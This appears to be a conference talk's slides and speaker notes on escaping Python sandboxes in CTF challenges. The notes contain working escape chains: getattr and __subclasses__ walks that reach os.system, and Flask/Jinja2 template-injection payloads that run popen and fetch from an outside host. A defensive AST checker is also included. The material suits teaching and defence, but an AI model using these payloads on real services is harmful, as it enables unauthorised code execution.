Escaping the python sandbox

Tomer Zait, Security Researcher at F5 Networks
Escaping the python sandbox
$
•
•
•
•
• @realgam3
• https://linkedin.com/in/realgam3
• https://github.com/realgam3
Objects
# Challenge sandbox (Python 2: raw_input, list-returning keys()).
from __future__ import print_function

# Remove every builtin except the two the challenge needs.
# keys() returns a list copy here, so the dict can be modified while iterating.
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]

# Substring blacklist applied to the submitted input.
banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]
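As an added example (not code from the slides or the challenge): the sandbox above filters on substrings, which the speaker notes sidestep by assembling names at run time ("va"+"rs", 's%stem' % 'ys') and by walking dunder attributes. A parse-tree check rejects the structure of such input instead of its spelling. The name set and the finding strings are assumptions chosen for this example.

```python
import ast

# Names that give a snippet reflective reach into the interpreter.
# Assumed set for this example; trim it to what the host really needs to expose.
REFLECTION_NAMES = {
    "getattr", "setattr", "delattr", "vars", "globals", "locals", "dir",
    "__import__", "__builtins__", "open", "compile", "exec", "eval",
}


def _is_str(node):
    return isinstance(node, ast.Constant) and isinstance(node.value, str)


def check_source(src):
    """Return a list of findings for one submitted snippet; [] means it passed."""
    findings = []
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError as exc:
        return ["syntax error: %s" % exc.msg]
    for node in ast.walk(tree):
        # "".__class__.__mro__[...]: the walk from a harmless object to the interpreter
        if isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            findings.append("dunder attribute %s" % node.attr)
        # getattr(__builtins__, ...), __file__, open(...): reflective entry points
        elif isinstance(node, ast.Name):
            if node.id in REFLECTION_NAMES or node.id.startswith("__"):
                findings.append("reflective name %s" % node.id)
        # import os / from os import system
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append("import statement")
        # "va"+"rs" and 's%stem' % 'ys': names assembled at run time to dodge a
        # substring blacklist; the parse tree exposes the assembly itself
        elif isinstance(node, ast.BinOp) and (_is_str(node.left) or _is_str(node.right)):
            findings.append("string assembly")
    return findings


def is_allowed(src):
    return not check_source(src)
```

A check like this narrows the surface but is not a security boundary: the pysandbox project linked below was declared broken by design by its own author, so untrusted Python still belongs in an OS-level sandbox (separate user, container, seccomp) with the checker as defense in depth.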
Links
• http://pyconil2018.realgame.co.il
• https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-5-PySandbox.pdf
• https://github.com/vstinner/pysandbox
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2.html
If You Really Like CTF Challenges
Editor's Notes

  1. My name is Tomer Zait and I'm a security researcher at F5 Networks. I'm a practical software engineer and offensive security expert. I love CTFs and writing open source software. By the way, you are welcome to contribute code, or follow me on Twitter or GitHub.
  2. Secure Pyshell:
     print('')
     print("")
     print(".")
     print(open)
     print(__file__)
     print(open(__file__))
     print(getattr(open(__file__),"read"))
     print(getattr(open(__file__),"read")())
     print(__builtins__)
     print(dir(__builtins__))
     print(getattr(__builtins__,"vars"))
     print(getattr(__builtins__,"va"+"rs"))
     print(getattr(__builtins__,"va"+"rs")())
     print(getattr(__builtins__,"va"+"rs")()["os"])
     print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
     print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
  3. Zumbo 3 (Flask/Jinja2 template injection):
     {{1+1}}
     {{request.environ}}
     {{config}}
     {%set a = 1+2%}{{a}}
     {{config.__class__.__init__.__globals__}}
     {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
     {{[].__class__.__base__.__subclasses__()}}
     {{[].__class__.__base__.__subclasses__()[351]}}
     As sent in the URL, with "%" encoded as %25:
     {%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}}
     References:
     http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
     https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
  4. Python 2 (func_globals):
     print("".__class__.__mro__)
     print("".__class__.__mro__[-1].__subclasses__())
     print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
     print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
  5. Ask: "What are the actual alternatives that Omer Simpson has?"